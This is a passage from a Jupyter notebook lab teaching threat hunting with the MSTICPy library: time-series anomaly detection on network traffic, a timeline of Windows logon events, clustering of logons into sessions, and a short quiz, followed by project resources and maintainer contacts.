In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's [time series analysis](https://msticpy.readthedocs.io/en/latest/msticpy.analysis.html?highlight=timeseries#module-msticpy.analysis.timeseries) machine learning capabilities to identify anomalies in our network traffic for further investigation.<br>
As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.


In [66]:
# Import MSTICPy's timeseries specfic features
from msticpy.analysis.timeseries import timeseries_anomalies_stl
from msticpy.nbtools.timeseries import display_timeseries_anomolies

# Load some network data to apply our analysis to
stldemo = qry_prov.Network.get_network_summary()

# Conduct our timeseries analyis
output = timeseries_anomalies_stl(stldemo)
# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=output, y="TotalBytesSent")

Loading BokehJS ...

Column(id='3553', ...)

<div class="alert alert-block alert-success">

<h3>Lab Exercise 7</h3>
Using the timeline above answer the following questions:

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Hover over points on the timeline to see additional information</li>
    </ul>
</details>
</div>

In [67]:
import ipywidgets as widgets

md("On what date did the two network data anomolies occur?", "bold")
date = widgets.DatePicker(description="Pick a Date", disabled=False)
display(date)

md("How many bytes were sent on at 2020-07-06 19:00?", "bold")
bytesa = widgets.Text(description="Answer:", disabled=False)
display(bytesa)

DatePicker(value=None, description='Pick a Date')

Text(value='', description='Answer:')

In [68]:
if str(date.value) == answers["question1"] and bytesa.value == answers["question2"]:
    md(
        f"Correct, the anomolies occured on {date.value} and {bytesa.value} bytes were transfered at 2020-07-06 19:00"
    )
else:
    md("One of your answers is incorrect please try again")

### Logon Sessions
Logon events are key to understanding any host based activity. We have previously used MSTICpy's [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) to display value based data from our timeseries analayis. However, we can also use it to display multiple types of discrete data on the same timeline. This is particularly useful for Windows logon events where we plot different logon types (interactive, network, etc.) in different horizontal series.<br>
We can split the plot by simply providing it a column to split on, with the parameter `group_by`.

In [70]:
# Acquire data using a built in query
host_logons = qry_prov.WindowsSecurity.list_host_logons()

# Display timeline
tooltip_cols = ["TimeGenerated", "Account", "LogonType", "TimeGenerated"]
host_logons.mp_plot.timeline(
    title="Host Logons", source_columns=tooltip_cols, group_by="LogonType", height=200
)

Loading BokehJS ...

Column(id='4131', ...)

When presented with a large number of events such as we have here its useful to cluster these into a more managable number of groups. MSTICpy contains [clustering features](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html?highlight=cluster_events#msticpy.sectools.eventcluster.dbcluster_events) that can be used against a number of data types. Once clustering is complete we use another [widget](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=SelectItem#msticpy.nbtools.nbwidgets.SelectItem) to let the user select the cluster they want to focus on.

In [71]:
from msticpy.analysis.eventcluster import (
    _string_score,
    add_process_features,
    dbcluster_events,
)

# Get data annd convert some values into numericals
logon_features = host_logons.copy()
logon_features["AccountNum"] = host_logons.apply(
    lambda x: _string_score(x.Account), axis=1
)
logon_features["TargetUserNum"] = host_logons.apply(
    lambda x: _string_score(x.TargetUserName), axis=1
)
logon_features["LogonHour"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)

# run clustering
(clus_logons, _, _) = dbcluster_events(
    data=logon_features,
    time_column="TimeGenerated",
    cluster_columns=["AccountNum", "LogonType", "TargetUserNum"],
    max_cluster_distance=0.0001,
)

# Sort and format the clustering scores to group similar logon events into sessions
dist_logons = clus_logons.sort_values("TimeGenerated")[
    ["TargetUserName", "TimeGenerated", "LastEventTime", "LogonType", "ClusterSize"]
]
dist_logons = dist_logons.apply(
    lambda x: (
        f"{x.TargetUserName}:    "
        f"(logontype {x.LogonType})   "
        f"timerange: {x.TimeGenerated} - {x.LastEventTime}    "
        f"count: {x.ClusterSize}"
    ),
    axis=1,
)
# Extract the distinct sessions
dist_logons = {v: k for k, v in dist_logons.to_dict().items()}


def show_logon(idx):
    return nbdisplay.format_logon(pd.DataFrame(clus_logons.loc[idx]).T)


# Display the sessions in a selection widget for later use
logon_wgt = nbwidgets.SelectItem(
    description="Select logon cluster to examine",
    item_dict=dist_logons,
    action=show_logon,
    height="200px",
    width="100%",
    auto_display=True,
)

Account: SYSTEMAccount Domain: NT AUTHORITYLogon Time: 2019-02-09 12:32:50.220000Logon type: 5(Service)User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEMSubject (source) account: WORKGROUP/MSTICAlertsWin1$Logon process: Advapi Authentication: NegotiateSource IpAddress: -Source Host: -Logon status:


---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Summary</h1>

MSTICPy has many features, in the lab you have only just started to scratch the surface. We have many more features to explore.<br>
In addition MSTICPy is a work in progress and we are very open to contributions, improvements, feedback, and feature requests from the community.

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Check out our Microsoft Learn TV session</h1>

Check out our one-hour live broadcast on Microsoft Learn TV on **May 20 at 1PM PT**,
where we’ll dive deep into MSTICPy and it’s many uses! Special focus on extending MSTICPy.

More details and save-the-date at https://aka.ms/thelaunchspacemsticpy.

---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Resources</h1>

MSTICPy Documentation - https://msticpy.readthedocs.io<br>
GitHub repo - https://github.com/microsoft/msticpy<br>
Blog - https://msticpy.medium.com<br>

Sample notebooks:
- https://github.com/microsoft/msticpy/tree/master/docs/notebooks
- https://github.com/Azure/Azure-Sentinel-Notebooks


<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Contacts</h1>

MSTICPy is built and maintained by:
<ul>
    <li>Ian Hellen</li>
    <li>Pete Bryan</li>
    <li>Ashwin Patil</li>
</ul>

If you have any questions please reach out to us on [GitHub](https://github.com/microsoft/msticpy) or at:<br>
Email - msticpy@microsoft.com<br>
Twitter - [@msticpy](https://twitter.com/msticpy), [@ianhellen Ian Hellen](https://twitter.com/ianhellen), [@MSSPete (Pete Bryan)](https://twitter.com/MSSPete), [@AshwinPatil (Ashwin Patil)](https://twitter.com/ashwinpatil)<br>
GitHub - [@ianhelle](https://github.com/ianhelle), [@PeteBryan](https://github.com/petebryan), [@Ashwin-Patil](https://github.com/ashwin-patil)<br>
LinkedIn - [@ianhellen](https://www.linkedin.com/in/ianhellen/), [@PeteBryan](https://www.linkedin.com/in/peter-bryan-77588473/), [@AshwinPatil](https://www.linkedin.com/in/ashwinrp/)